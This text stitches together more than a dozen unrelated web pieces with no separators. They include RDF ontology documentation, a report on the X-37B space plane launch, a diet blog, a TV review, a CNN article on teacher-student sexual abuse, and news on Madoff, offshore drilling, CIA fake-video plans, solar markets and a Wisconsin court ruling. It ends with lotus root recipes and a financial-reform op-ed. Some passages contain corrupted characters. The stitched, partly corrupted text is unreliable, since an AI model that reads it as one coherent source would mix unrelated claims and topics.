By using RDF , the Bibliographic Ontology gains a powerful extensibility mechanism , allowing Bibliographic - Ontology - based descriptions to be mixed with claims made in any other RDF vocabulary .
The Bibliographic Ontology as an ontology cannot incorporate everything we might want to talk about that is related to citations and bibliographic references .
Instead of covering all topics within the Bibliographic Ongoloty itself , we describe the basic topics and build into a larger framework - RDF - that allows us to take advantage of work elsewhere on more specific description vocabularies .
RDF provides the Bibliographic Ontology with a way to mix together different descriptive vocabularies in a consistent way .
Vocabularies can be created by different communities and groups as appropriate and mixed together as required , without needing any centralized agreement on how terms from different vocabularies can be written down in XML or N3 .
Check the Ontology namespaces referenced section to find some ontologies that ca be use in conjonction with the Bibliographic Ontology .
There are mechanisms for saying which RDF properties are connected to which classes , and how different classes are related to each other , using RDF Syntax and OWL .
These can be quite general ( all RDF properties by default come from an rdf : Resource for example ) or very specific and precise ( for example by using OWL constructs ) .
This is another form of self - documentation , which allows you to connect different vocabularies together as you please .
In summary then , RDF is self - documenting in ways which enable the creation and combination of vocabularies in a devolved manner .
This is particularly important for an ontology which describes communities , since online communities connect to many other domains of interest , which it would be impossible ( as well as suboptimal ) for a single group to describe adequately in non-geological time .
RDF is usually written using the XML or N3 syntaxes .
If you want to process the data , you will need to use one of the many RDF toolkits available , such as Jena ( Java ) or Redland ( C ) .
More information about RDF can be found in the RDF Primer .
The Bibliographic Ontology Documentation
Star Wars 2010 ?
U.S. military launch space plane on maiden voyage ... but its mission is top secret
A top secret space plane developed by the US military has blasted off from Cape Canaveral on its maiden voyage .
Billed as a small shuttle , the unmanned X - 37B heralds the next generation of space exploration .
It will be the first craft to carry out an autonomous re-entry in the history of the US programme .
But its mission - and its cost - remain shrouded in secrecy .
The Air Force said the launch was a success but would give no further details .
However , experts have said the spacecraft was intended to speed up development of combat - support systems and weapons systems .
There have already been accusations that the programme could lead to the ' weaponisation ' of space .
SCROLL DOWN FOR VIDEO REPORT
[ caption ]
Ready for launch :
The X - 37B rocket in Florida before it blasted off into space
[ caption ]
Speaking after the launch , Air Force deputy under - secretary for space systems Gary Payton , admitted it was impossible to hide a space launch but was cagey about the what exactly the X - 37B would do .
' On this flight the main thing we want to emphasise is the vehicle itself , not really , what 's going on in the on - orbit phase because the vehicle itself is the piece of news here , ' he said .
He refuted claims that the craft was a step towards military dominance in space .
' I do n't know how this could be called weaponisation of space , ' he said .
' It 's just an updated version of the Space Shuttle type of activities in space .
' We , the Air Force , have a suite of military missions in space and this new vehicle could potentially help us do those missions better . '
The X - 37B Orbital Test Vehicle took a decade to develop and will spend up to nine months in orbit .
It will re-enter Earth on autopilot and land , just like an ordinary plane , at the Vandenberg Air Force Base , California .
The decision on when it returns to Earth is dependant on the Air Force are satisfied with the tasks it has been set to carry out in space .
' In all honesty , we do n't know when it 's coming back for sure , ' Mr Payton said .
' It depends on the progress we make with the on - orbit experiments and the on - orbit demonstrations . '
Mystery : Scientists work on a prototype for the rocket prior to its launch
[ caption ]
[ caption ]
When it is time for the plane to come back down , commanders will send out a message which will make it re-enter orbit .
It will then navigate its way back to the air force base .
While in orbit the spacecraft will conduct a number of classified experiments the results of which will be brought back to Earth for analysis .
The military has not revealed what those experiments will entail .
Mr Payton said the Air Force 's main interest is to test the craft 's automated flight control system and learn about the cost of turning it around for launch again .
The X - 37B is 9 m long ( 29 ft ) and has a wingspan of 4.5 m ( 15 ft ) , making it a quarter of the size of a normal Shuttle .
It is powered by a solar cells and lithium - ion batteries , unlike a traditional craft which is powered by a fuel cell system .
It has a large engine at the rear for orbit changing .
The space plane is also reusable .
Built by Boeing 's Phantom Works division , the X - 37 program was originally headed by Nasa .
It was later handed over to the Pentagon 's research and development arm and then to a secretive Air Force unit .
Hundreds of millions of dollars have been spent on the project , but the true total has not been revealed .
The Air Force has given a very general description of the mission objectives : testing of guidance , navigation , control , thermal protection and autonomous operation in orbit , re-entry and landing .
While the massive Space Shuttles have been likened to cargo - hauling trucks , the X - 37B is more like a sports car , with the equivalent trunk capacity .
Dr Joan Johnson - Freese , chair of national security and decision making at the US Naval War College in Newport , Rhode Island , told the BBC the launch was something of an experiment for the military .
' It might be at this point in time that ( the US Air Force is ) going to roll the dice and see if something good happens , ' she said .
' If it does , they 'll continue with it .
Otherwise , this will be another one of those projects that goes into a bin somewhere . '
She claimed the US military had wanted a craft with the ability to loiter in space for some time .
' If it lives up to its speculated hype , it could be a manoeuvrable satellite , ' she said .
' You could move it to , for example , hover over the straits of Taiwan and it could evade attempts to shoot it down .
It could do a lot of things that up until this point have been mostly fiction . '
A second experimental plane is already on order and is due to launch in 2011 .
[ caption ]
You may not know about the Harvard Healthy Eating Pyramid , but in my opinion , it represents the most independent , research - based guide to nutrition available today .
Other nutrition guides such as the USDA Food Pyramid are tainted by special interests such as the milk , grain , and beef industries that happen to have representatives on the USDA Advisory Committee .
Diet gurus are usually pushing supplements , the media is constantly discussing the latest fad diet , while the food industry is thinking about its bottom line , not your health ( i.e. selling foods with refined carbs , which are cheaper and have a longer shelf life ) .
Being a Yalie , it ’s hard for me to promote anything with the word “ Harvard ” in it , but I guess I ’ll make an exception here .
The following is an image of the Harvard Healthy Eating Pyramid , which represents 40 years of solid , independent research :
Click on Image to Make it Larger
( opens in new window )
Healthy foods are vegetables , fruits , lean meats , healthy oils , grains , nuts & beans , and low fat dairy .
Vegetables , fruit , and grains at the base of the Pyramid should form the bulk of your food intake .
American staples such as salty foods , deep fried anything , fatty , processed meats like hamburgers , and refined carbs like white bread , pasta , or rice ideally should be eaten sparingly , or avoided while alcohol should be consumed in moderation .
You will be amazed at how much healthy food you can eat , and how long your hunger will be satisfied , while still keeping your calories in check .
I think the Harvard Healthy Eating Pyramid is idealized , in that it ’s hard to get a perfect balance of the quality of foods as it suggests , but in future posts , I will make eating healthier less daunting for you .
It ’s really not that bad if you know some tricks to make it easier .
I want to make clear that healthy eating is obviously desirable , but it does not necessarily translate into a leaner body .
What I personally strive for is eating in a way that ’s healthy AND melts fat off my body while maintaining my muscle mass .
My critique of this pyramid is that protein intake is not emphasized enough for people who strength train consistently .
For example , some studies show protein intake as high as 1.75g per kilogram of body weight ( 0.8g per pound ) is desirable for active individuals who strength train to maintain , or increase lean muscle mass .
Harvard is a lot more concerned with disease prevention , not how to get a six pack !
In addition , your total calorie intake is an important determinant of whether or not you lose fat ( even if you are eating healthy ) and also your frequency of eating .
I introduced you to this pyramid because I want you to understand what research has proven to be the “ ideal ” healthy food intake for long term health .
What constitutes healthy nutrition is incredibly controversial ( for example , there are tons of people who believe any grain intake is a HUGE mistake ) , but I must go with the 40 years of independent research .
One more quick thing to mention - you may have noticed that exercise is actually at the base of the pyramid , which serves as the foundation of effective , sustainable weight control .
For much more on the Harvard Healthy Eating Pyramid , you can check out the website here : Harvard Healthy Eating Pyramid .
P.S. Does your food intake look anything like this Pyramid ?
What areas of your nutrition can you improve ?
FlashForward returns this Thursday with a 2 - hour episode .
The ratings have plummeted since the premiere , so clearly something is wrong with the show .
Here are my thoughts .
The writers expect us to believe that a random FBI field office in Los Angeles can unravel this mystery by itself , and determine the fate of the world .
Give me a break .
The most egregious foolishness stemming was Al 's suicide .
Somehow , he was the FIRST person in weeks to have died and seen something in the flashforward .
Really ?
Thousands of people die all the time , and none of them saw a anything in the flashforwards ?
The only reasons why the flashforward is important is 1 ) the future is not set in stone and 2 ) the flashforwards allow them to change the future .
The debate between fate and free will can only be resolved by empirical evidence : what actually happens 6 months later .
There 's " Suspect Zero , " D. Gibbons , the pylons in Somalia coinciding with the crow deaths and mass blackouts , the Blue Hand , Nazis , and the military contractor .
Each episode brings up something new , and there is n't resolution or advancement to the other plots .
Joseph Fiennes has to stop using that low growl all the time .
It makes his character unlikable and unrealistic .
The rest of the performances have n't been spectacular either , and the cast seems great on paper .
I 'm not looking for a Joss Whedon or David Milch .
At the very least , the writers have to stop putting obvious statements uttered in grandiose fashion at the end of every act .
Then give the characters personality and positive qualities .
( CNN ) -- Middle - and high school students may look to their teachers as mentors or even friends .
In rare but high - profile cases , experts say , the relationship may go too far , into the sexual realm .
However the situation unfolds , it is always the responsibility of the teacher to keep appropriate boundaries .
" It 's never the kid 's fault , " said New York psychologist Judith Alpert .
Amy Beck , a 33 - year - old sixth - grade teacher in Burbank , California , is in police custody charged with five counts of unlawful sex with a person under 16 .
The student in question , a boy , was 14 at the time and has since moved to a different school , officials said .
For some , the case may evoke memories of Mary Kay Letourneau , now Mary Kay Fualaau , who served more than seven years in prison for having sex with a 13 - year - old former student .
They had two children and married in 2005 .
What makes the latest case unusual , police say , is that the teacher turned herself in voluntarily and told detectives she had had inappropriate sexual relations with a student .
Police say they went to verify this with the student and he confirmed it .
Beck is married to a police officer and the mother of three children .
She recently resigned from her teacher 's job and is still in jail .
Her arraignment , originally scheduled for Wednesday , was postponed until March 25 .
If tried and convicted , she could face up to seven years in prison .
Although cases like these involving women attract attention , female teachers are more restrained in their sexual behavior in general , said Karin Meiselman , a psychologist in private practice in Pasadena , California .
Cases involving male teachers happen more frequently but are n't as much in the public eye , she said .
The teacher - student relationship mirrors that of the parent and child in the sense of a large power difference between perpetrator and victim , making sexual acts between instructor and pupil related to incest , experts say .
In both situations , the younger person is dependent on the authority figure , said Clare Cosentino , a psychologist in New York .
The person in power is unable to see the child 's needs clearly and crosses established boundaries , she said .
But usually , the victims of incest are younger than those who are sexually abused by a teacher , Alpert said .
If a parent is the perpetrator , the child is more trapped because the abuse occurs at home .
Moreover , there are often threats involved in incest that are not present in teacher - student relations .
For example , a man may threaten to burn the house down if his daughter tells anyone about how he abuses her .
Students , on the other hand , may simply be vulnerable to the attention of a teacher or even give in to sexual acts for the sake of better grades .
A phenomenon psychologists call transference occurs when people shift the feelings they had about parents to others , such as teachers .
For instance , a male teacher may make a female student feel overpowered , just like a father figure , so she gives in , Alpert said .
Even if the student is perceived as flirtatious , " teachers should still keep their boundaries , " Meiselman said .
Loneliness or dissatisfaction with one 's relationships may be one factor driving teachers to sexually abuse students , Meiselman speculated .
Children , being emotionally expressive and appealing , may become a source of emotional gratification and then sexual gratification when a certain line is crossed , she said .
" It 's hard to see how they lose track of reality , but people do lose track of reality , especially when they 're depressed or maybe abusing substances and things like that , " she said .
Teachers who have sex with students may be deeply insecure or have unresolved issues of their own , Cosentino said .
They may be having a transitional crisis in their lives and welcome the admiration of a student who essentially puts them on a pedestal .
" They may fool themselves into thinking that this is a real love relationship without really understanding the power differential , the ways in which it 's profoundly damaging to the student , " she said .
Often , students vulnerable to these situations are also needy and do n't relate well to peers their own age , she said .
Some , but not all , adults who abuse minors have sexual abuse in their own histories , Meiselman said .
These people may have identified with their abusers and taken on characteristics of the person who abused them , she said .
A student who has had inappropriate relations with a teacher will need therapy , even if the relationship felt consensual to the young person , Cosentino said .
The student should explore why he or she felt vulnerable to the attraction of the teacher .
" As much as it may not have been experienced as trauma , it 's an abuse of power and crossing of a boundary , a loss of innocence , " she said .
There are also parallels between teacher - student sexual abuse and inappropriate relations between priests or other clergy and children , Meiselman said .
In both cases , parents tend to trust the figure of authority and may not pick up on signs that something is amiss .
" It 's a serious violation of trust , both for the child and for the child 's parents , " she said .
To help prevent sexual abuse in school , children should be alerted to their rights in any situation involving a sexual predator , Meiselman said .
They should be taught that if an adult does something to make them feel uncomfortable , they should tell a parent or other trustworthy person .
" Adults tend to picture sexual predators as weird - looking people in trench coats .
A good education program emphasizes it could be anybody , " she said .
Schools should also train their staff on how to handle situations that would trigger concerns about possible sexual abuse , experts said .
Parents should be suspicious if the relationship between the teacher and the student seems excessive or obsessive , and seems to be becoming more important than other developmentally appropriate experiences , Cosentino said .
" A sixth - grader should be spending most of their time with other sixth - graders , " she said .
Bernard Madoff , who is serving a 150 - year sentence in North Carolina for running a fraud scheme that cost investors billions of dollars , was physically assaulted by another inmate in December , according to three people familiar with the matter .
After the attack , Madoff , who pleaded guilty a year ago and was sent to a federal prison in Butner , N.C. , was moved on Dec. 18 to the prison 's low - security medical center for treatment .
At the time , the Bureau of Prisons said that rumors of an assault were false and that Madoff suffered from dizziness and hypertension .
One of his lawyers , Ira Sorkin , added at the time that Madoff was experiencing high blood pressure and heart palpitations .
Mr. Sorkin declined to comment Wednesday on whether his client was beaten , saying , " I do n't comment on prison conditions or his family .
That has been my policy . "
Madoff was treated for a broken nose , fractured ribs and cuts to his head and face , according to a felon currently at Butner serving time on drug charges who was familiar with his condition at the time .
The details of the injuries could n't be independently verified .
Another inmate who recently was released from Butner after serving time on drug charges also confirmed the assault , as did a third person familiar with Mr. Madoff 's situation .
The former inmate said the dispute centered on money the assailant thought he was owed by Madoff .
Click here to read more from The Wall Street Journal .
WASHINGTON Ã¢â‚¬â€œ
Responding to likely the worst oil spill in US history , freshman Rep. John Garamendi ( D - CA ) is set to introduce legislation later today that would “ permanently prohibit ” offshore drilling all along the Pacific Coast .
The brief two - page bill , which the congressman has dubbed the “ West Coast Ocean Protection Act of 2010 , ” was provided by his office to Raw Story .
It seeks to “ amend the Outer Continental Shelf Lands Act ” to ban oil exploration “ off the coast of California , Oregon , and Washington . ”
ADVERTISEMENT
“ If you have any doubts on the need for this legislation , there ’s an oil slick the size of Puerto Rico that I want to introduce you to , ” Garamendi said in a statement to Raw Story .
The Gulf Coast spill has reinforced the representative ’s longstanding opposition to a policy that Democrats are divided on and Republicans vigorously support — and one that President Barack Obama has backed to an extent .
“ The people of the Gulf Coast are now witnessing the unnatural consequence of ‘ drill , baby , drill , ' ” Garamendi said .
“ Precious wetlands and hundreds of miles of coastline are at risk , multi-billion dollar ocean - based industries are threatened , and the experts say this spill could continue for months . ”
The bill arrives just two days after Gov. Arnold Schwarzenegger of California , where Garamendi served as lieutenant governor until being elected to Congress last year , rescinded his support for offshore drilling and cited the “ enormous disaster ” in the Gulf .
“ I do nÃ¢â‚¬â „ ¢t want to see this devastation in California , ” Garamendi continued .
“ My bill would re-institute the congressional moratorium on new offshore oil drilling in federal waters on the West Coast .
A congressional moratorium served us well for two and a half decades . ”
ADVERTISEMENT
The congressman will in the coming days discuss his efforts in a press conference alongside co-sponsors , environmental allies , and industry representatives impacted by the Gulf crisis , his spokesman told Raw Story .
President Obama — who five weeks ago announced his intention to lift the moratorium on offshore oil and natural gas drilling along the Gulf of Mexico , the Atlantic coastline , and northern parts of the Alaskan coast — has postponed plans until the spill is contained .
White House spokesman Robert Gibbs said Monday in a press briefing that it would be “ premature ” for the president to terminate the proposal — viewed largely as an olive branch to court Republican support for comprehensive energy reform — but hinted that the incident may cause him to reevaluate .
This is an innovative new series that places a critique of the idealized culture of the American heartland within the context of a folksy small town isolated by yeti- filled mountains and under the control of a strange blue man .
Want to Know How to Buy Cardboard Boxes Wholesale ?
Do you want to know how to buy cardboard boxes wholesale ?
Learn here some out of the ordinary hacks and tips …
The Agency reportedly bounced around the idea of making a fake video depicting the deposed Iraqi president having sex with a young boy and circulating it around Iraq .
The Agency also made a tape depicting Osama bin Laden and others drinking alcohol around a campfire that was not circulated .
25 May 2010 | InfoShop News
As the Iraq Operations Group of the Central Intelligence Agency ( C.I.A. ) was planning for the 2003 invasion of Iraq , agents “ kicked around a number of ideas for discrediting Saddam Hussein in the eyes of his people ” , Jeff Stein reports at his Washington Post blog , which included circulating a fake video depicting then - Iraqi President Saddam Hussein as a homosexual pedophile :
One was to create a video purporting to show the Iraqi dictator having sex with a teenage boy , according to two former C.I.A. officials familiar with the project .
“ It would look like it was taken by a hidden camera , ” said one of the former officials .
“ Very grainy , like it was a secret videotaping of a sex session . ”
The idea was to then “ flood Iraq with the videos , ” the former official said .
The standout from Mr. Stein ’s report is how exploiting cultural taboos within Islam would be used .
The Agency ’s interrogation methods of detainees reflected , not only tactics generally emasculating , but utilized to such an extent that it was not only within deliberate contingency plans , but most likely pre-formatted in the detention policy .
This is also reflected in its actual creation of a fake video depicting terrorists — contrary to the professed Islamic fundamentalist caricatures — getting drunk together :
The agency actually did make a video purporting to show Osama bin Laden and his cronies sitting around a campfire swigging bottles of liquor and savoring their conquests with boys , one of the former C.I.A. officers recalled , chuckling at the memory .
The actors were drawn from “ some of us darker - skinned employees , ” he said .
Eventually , “ things ground to a halt , ” the other former officer said , because no one could come to agreement on the projects .
I ’m not too well - educated on detailed conspiracy theories regarding reported videos of Osama bin Laden , his messages , his supposed confession to 9/11 , etc. , but Mr. Stein ’s report ought to further validate the legitimate scrutiny of these videos ’ authenticity .
I ca n’t imagine what why “ no one could come to agreement ” on such “ projects ” to manufacture confessions and future threats .
The 2004 October Surprise comes to mind and Steve Watson at Prison Planet — for what it ’s worth — raises the scrutiny level just that much .
As for inner-Agency objections , they were that they would n’t be effective — not that they would be manufactured humiliations to falsely manufacture consent for a brutal war and occupation :
The ideas were patently ridiculous , said the other former agency officer .
“ They came from people whose careers were spent in Latin America or East Asia ” and did n’t understand the cultural nuances of the region .
“ Saddam playing with boys would have no resonance in the Middle East — nobody cares , ” agreed a third former C.I.A. official with extensive experience in the region .
“ Trying to mount such a campaign would show a total misunderstanding of the target .
We always mistake our own taboos as universal when , in fact , they are just our taboos . ”
Iraq was n’t a Saudi-esque fundie culture during the Ba’athist reign of Hussein , so such tactics would ’ve been a “ total misunderstanding of the target ” .
But what about detaining people in the Fourth World villages of Afghanistan ?
Threats of raping detainees and their family members , for instance , is dehumanizing for many objective reasons .
If you totally understand the target , however , one would intentionally have a pre-formatted plan to attack their psyche with sexually related threats and actions .
The War of Terror is riddled with an eerie pattern of sexual abuse and humiliation by soldiers and interrogators at U.S. military detention centers — most notably at Abu Ghraib , as reported by the heroic Seymour Hersh at The New Yorker , and the revelation these methods were replicated from those utilized at Guantánamo , which continued after the former scandal was publicized .
These are n’t ignorant Neanderthal acts of boredom or simpleton objectification .
These crimes against humanity are exceedingly conscientious of the way these cultures fundamentally view sexual relations and self - worth .
Again , every culture has strong sexual interpretations and views of domination - submission relations to sex .
But it ’s vital to comprehend the more archaic Islamofundie sexual propaganda to come close to understanding the U.S. governments use of torture in the War of Terror .
Mr. Hersh , shortly after breaking the story of torture at Abu Ghraib , reported :
According to interviews with several past and present American intelligence officials , the Pentagon ’s operation , known inside the intelligence community by several code words , including Copper Green , encouraged physical coercion and sexual humiliation of Iraqi prisoners in an effort to generate more intelligence about the growing insurgency in Iraq .
A senior C.I.A. official , in confirming the details of this account last week , said that the operation stemmed from Rumsfeld ’s long - standing desire to wrest control of America ’s clandestine and paramilitary operations from the C.I.A … .
The notion that Arabs are particularly vulnerable to sexual humiliation became a talking point among pro-war Washington conservatives in the months before the March , 2003 , invasion of Iraq .
One book that was frequently cited was The Arab Mind , a study of Arab culture and psychology , first published in 1973 , by Raphael Patai , a cultural anthropologist who taught at , among other universities , Columbia and Princeton , and who died in 1996 .
The book includes a twenty - five - page chapter on Arabs and sex , depicting sex as a taboo vested with shame and repression .
“ The segregation of the sexes , the veiling of the women . . . and all the other minute rules that govern and restrict contact between men and women , have the effect of making sex a prime mental preoccupation in the Arab world , ” Patai wrote .
Homosexual activity , “ or any indication of homosexual leanings , as with all other expressions of sexuality , is never given any publicity .
These are private affairs and remain in private . ”
The Patai book , an academic told me , was “ the bible of the neocons on Arab behavior . ”
In their discussions , he said , two themes emerged — “ one , that Arabs only understand force and , two , that the biggest weakness of Arabs is shame and humiliation . ”
The government consultant said that there may have been a serious goal , in the beginning , behind the sexual humiliation and the posed photographs .
It was thought that some prisoners would do anything — including spying on their associates — to avoid dissemination of the shameful photos to family and friends .
The government consultant said , “ I was told that the purpose of the photographs was to create an army of informants , people you could insert back in the population . ”
The idea was that they would be motivated by fear of exposure , and gather information about pending insurgency action , the consultant said .
If so , it was n’t effective ; the insurgency continued to grow .
Recently in Iraq , more than 100 were tortured , regularly beaten , electrocuted , suffocated , put in stress positions for hours , repeatedly raped , extorted from in a secret Baghdad prison run by the Iraq government .
After the discovery of this secret prison at Muthanna , I wrote about how this is not foreign element of the Iraqi government — the conduct and systematic cover - up and denial .
It is system replicated from the U.S. government exported to Iraq .
LOS ANGELES / FRANKFURT ( Reuters ) - Global solar demand has surged on brisk buying from Germany , but analysts are split over whether the market will break down once incentives in the world ’s largest solar market are pared back .
A power generating wind turbine is reflected in solar panels near Mainz , March 10 , 2010 .
REUTERS / Thomas Bohlen
The recent surge in sales has helped the industry recover from a brutal 2009 , when prices for the modules that turn sunlight into electricity tumbled by more than 40 percent as a glut of supplies and difficult financial markets slowed growth .
That rebound may be short - lived .
UBS , in a recent report , forecast strong German growth throughout the year , but predicted a steep drop after midyear .
The investment bank said it expected new German solar installations to reach 2.5 gigawatts in the first six months of this year , but that figure will shrink by as much as 60 percent to between 1 GW and 1.5 GW in the second half .
Berlin is set to reduce the mandated prices to be paid for electricity from German solar arrays from July , with proposed cuts of 16 percent for roof - installed panels and a drop of 11 percent for conversion sites like dumps and unused army bases .
That has pulled projects forward as developers try to bring them online ahead of the cuts , helping to boost sales for key solar players like Suntech , First Solar , SunPower and Q - Cells .
Still , Germany , which made up 50 percent of the global solar demand in 2009 , will continue to be a major buyer , other analysts said .
“ You ’ll see a temporary disruption in Germany , which will cause a bit of a hiccup in demand , ” said analyst Adam Krop with Ardour Capital Investment in New York .
Cowen & Co analyst Rob Stone said fears of a sharp drop were overdone .
“ The impact inside Germany will be less than people are imagining , ” he said .
“ There will still be attractive opportunities ( there ) in the second half of this year . ”
RAYS OF LIGHT ?
Stone , Krop and many solar executives are betting new demand in up - and - coming markets such as Italy , the United States and Japan will help offset the slowdown in Germany , but others are skeptical .
“ It remains to be seen whether those other major markets will demonstrate strong growth in the second half of 2010 , ” said Gabelli & Co analyst Hendi Susanto .
Q - Cells , now the world ’s fourth - biggest maker of solar cells after handing the top spot to First Solar last year , warned in February of an uncertain 2010 as countries cut financial support for solar power and low - cost producers pressure prices .
Demand in Italy , Europe ’s third - largest solar market , has been growing , and is expected to balloon briefly at the end of this year before the country trims its own generous feed - in tariff -- the price power distributors are required to pay generators for renewable energy -- gradually by up to 20 percent starting next year .
Even under ideal policy scenarios , European countries excluding Germany are expected to expand only by 2.7 GW of modules in 2010 , according to industry association EPIA , lagging estimates for Germany , which is expected to grow year - on - year despite the cuts .
Fears that demand in Germany will fall sharply in the second half of the year have triggered concerns that prices for modules will decline dramatically again .
Ardour Capital ’s Krop said he expected prices to fall 10 percent in the first half of 2010 and up to 15 percent in the second half .
Suntech , China ’s largest solar panel maker , is more optimistic and recently said it does not expect the average selling prices ( ASPs ) for its modules to drop significantly after Germany ’s subsidy cuts .
Cowen & Co ’s
Stone said the fall in second - half demand will likely pressure prices for modules down between 5 and 6 percent from levels in the first six months -- but that decline could be a benefit .
“ In the same way they did last year , falling prices should stimulate demand , ” he said .
The little genetically engineered worm guy ’s name is Styli .
Styli the Meat Tube .
Or Meatube if you prefer .
Either way .
He prays nightly to a god that is n’t there to snuff out his wretched , tubey , meatish existence .
After playing with a Pogo Sketch stylus and an iPad at the Apple Store I asked my self this very question .
“ How do it work ? ” I still do n’t have any idea , but one can only assume the maddest of sciences are involved .
C2E2 is next weekend [ April 16 - 18 ] !!!
Come see me and every other webcomic person I know all in one convenient spot .
Oh such awkward stare there will be , children !
A bounty of social anxiety !
Check out this new “ Battlestar Galactica / United Nations So Say We All ” T - Shirt I made for Olmos Productions , Inc .
[ Edward shirts now at Topatoco ! ]
By of the
A federal judge has struck down a Wisconsin law that prohibits prison inmates from getting hormone therapy to treat gender identity disorder .
U.S. District Judge Charles N. Clevert Jr. , who presided over a civil trial challenging the law in 2007 , issued a ruling late Wednesday and declared the statute unconstitutional on several grounds .
Clevert 's order indicated a longer memorandum decision would follow .
In early 2006 , Clevert had issued a preliminary injunction to allow the hormone therapy to continue .
In Wednesday 's order , Clevert found that the law amounts to " deliberate indifference to the plaintiffs ' serious medical needs in violation of the Eighth Amendment , " because it denies hormone therapy without regard to those needs or doctors ' judgments .
He found the law unconstitutional on its face and also in violation of the inmates ' rights to equal protection .
" We 're very excited about it , " said Laurence Dupuis , legal director of the ACLU of Wisconsin Foundation , which represented the three named plaintiffs in the case .
Lambda Legal , a national advocacy group , was also part of the plaintiffs ' legal team .
" There have been other states with policies similar in ways to this and that were generally struck down or settled , but this was the first one with a statute passed by a legislature , " Dupuis said .
Another ACLU attorney on the case , John Knight , called the decision common sense .
" The court 's ruling does n't require inmates to receive hormones or surgery for sex reassignment , " Knight said .
" It simply means that doctors are the ones who make the decisions about treatment . "
He estimated that fewer than a dozen inmates are affected .
State lawmakers passed the Sex Change Prevention Act in 2005 in reaction to the case of a Wisconsin inmate who had been receiving the hormones for years , but sued when the Department of Corrections would not pay for sex - change surgery .
Similar challenges were mounted in other states .
Though Clevert 's ruling does n't address surgery , Dupuis said he thinks the ruling supports the principle that any medical care in prisons must be based on medical judgment , which means the surgery would at least be theoretically possible .
But Dupuis said the case has broader implications .
" It 's important to transgendered inmates , but also for other people in the system who have conditions that are unpopular and on which politicians might think they could make hay , " he said .
State Rep. Mark Gundrum ( R - New Berlin ) , a co-sponsor of the Sex Change Prevention Act , said he expects Clevert 's ruling will be appealed .
" There 's no way the Eighth Amendment 's prohibition against cruel and unusual punishment actually requires that taxpayers fund sex change operations for prisoners , " he said .
Rep. Scott Suder ( R - Abbotsford ) , another sponsor of the law , called Clevert 's ruling " a travesty of justice " that should be appealed immediately .
" This ruling puts a higher priority on helping inmate Tommy become Tammy than protecting the pocketbooks of law abiding citizens , " Suder said .
Bill Cosh , speaking for the Department of Justice , said the agency is reviewing the matter for possible appeal .
( From the archives - since all of a sudden , a lot of people are asking about lotus root !
Originally published in April 2008 . )
Lotus root ( renkon in Japanese ) is actually the rhizome of the lotus plant .
It 's a popular vegetable throughout southern and eastern Asia , but it 's still not that well known in the west .
Lotus root is full of fiber and various vitamins and other nutrients .
In Asia it 's believed to have various medicinal qualities , but in macro - nutrient terms it 's best to think of it as a starchy vegetable , like potato .
Visually of course , it 's very appealing with all those little holes .
Here I 'll explain how it 's prepared and eaten in Japan .
How to prepare lotus root
First off , this is how a raw lotus root looks like .
You can buy them at an Asian ( South or Eastern ) grocery store .
More often than not they will be vacuum packed .
A nice fresh one is a light orangey - brown .
The older the root the browner and darker it is .
Mature lotus root has a sort of slightly bitter or tannic quality , so should not be eaten raw .
( Apparently young lotus roots can be eaten raw , but I 've never encountered them unfortunately . )
The bitter / tannic substance is most concentrated in the skin , so you should peel it .
Inside , it 's a light flesh color .
( Another way to deal with a raw lotus root is to steam it whole , but peeling and slicing is easier for beginners . )
Raw lotus root will start to darken almost right away , rather like raw potato .
To prevent this , put the peeled lotus root in water with a little vinegar in it .
If I slice it up , I put the slices in the vinegar water .
If using the slices for a salad , or for any dish that has no further or very little more cooking , they should be boiled for a couple of minutes in vinegared water .
This retains the crunchy texture but gets rid of that tannic - ness .
You can also buy lotus root in cans , which can be used straight away .
However , many canned lotus roots have been bleached to make then whiter , so I prefer to use raw lotus root if I can find it .
( The natural color of lotus root is a very light flesh - orange . )
Changing textures
Depending on how long it 's cooked , the texture of lotus root varies from crunchy to very starchy and a little sticky .
I like it either way .
Here are two ways of using lotus root in its crunchy stage .
Recipe : Lotus root , cucumber and Serrano ham salad
1/2 lotus root , sliced very thinly and the slices cut into halves
1/2 English or seedless cucumber , de-seeded and sliced thin
1 - 2 slices of Serrano or other dried ham , cut into thin slivers
1/2 Tbs. rice vinegar plus additional for cooking
Dash salt
1 tsp. sugar
1 Tbs. mayonnaise
Put the sliced lotus root into vinegar water as you slice it , as described above .
Bring a pot of water to a boil , and add a little vinegar .
Boil the lotus root for a couple of minutes .
Drain and cool under running water ; drain well .
Mix the vegetables and seasonings except the mayonnaise together well with your hands , scrunching them a bit to let the flavors penetrate .
Add the mayonnaise and ham and mix well .
Serve immediately , or cool in the refrigerator until dinner time .
Recipe : Stir - fried lotus root with sesame and green onions
1/2 lotus root , sliced very thinly
1 piece of fresh ginger about 1 inch / 2 cm or so long , peeled and chopped
2 garlic cloved , peeled and chopped
1 1/2 cups of roughly chopped green onions
2 Tbs. hot red chili pepper , finely chopped
Oil
Vinegar for the lotus root water
1 Tbs. sesame seeds
Pepper
1 to 1 1/2 Tbs. soy sauce or to taste ( more if you intend to eat this the Japanese way , with plain white rice )
1 tsp. sesame oil
Put the sliced lotus root into vinegar water as you slice it , as described above .
Drain well just before cooking .
Heat up a large frying pan with the oil .
Add ginger and garlic , and stir fry until the oil is very fragrant .
Add the drained lotus root slices in a single layer .
Cook until the lotus root slices start to change color - they turn a bit translucent looking .
Turn over and cook a couple more minutes .
Add the chili pepper and green onions , and stir - fry .
Add the sesame seeds , pepper , soy sauce and sesame oil .
The lotus roots should get a bit caramelized from the soy sauce .
Serve hot or cold .
This is very nice for bento .
Other ways to eat lotus root
Lotus root mini-cakes with sweet chili sauce .
This uses the starchy , sticky quality of grated cooked lotus root .
Lotus root slices poached in dashi and vinegar - a very traditional Japanese dish
Cut up and put into soups or stews - the longer it 's cooked , the more starchy it gets
Deep - fried or baked as chips ( these baked ones on jugalbandi look great )
With a batter as tempura
Sandwich some meaty filling inside and pan-fry ( hasami-age )
Submitted by maki on 2009-02-02 11:53 .
If you enjoyed this article , please consider becoming my patron via Patreon .
^_^ Become a Patron !
Filed under : basics
So proposed reform legislation gives regulators “ resolution authority , ” which basically means giving them the ability to deal with the likes of Lehman in much the same way that the F.D.I.C. deals with conventional banks .
Who could object to that ?
Well , Mr. McConnell is trying .
His talking points come straight out of a memo Frank Luntz , the Republican political consultant , circulated in January on how to oppose financial reform .
“ Frankly , ” wrote Mr. Luntz , “ the single best way to kill any legislation is to link it to the Big Bank Bailout . ”
And Mr. McConnell is following those stage directions .
It ’s a truly shameless performance : Mr. McConnell is pretending to stand up for taxpayers against Wall Street while in fact doing just the opposite .
In recent weeks , he and other Republican leaders have held meetings with Wall Street executives and lobbyists , in which the G.O.P. and the financial industry have sought to coordinate their political strategy .
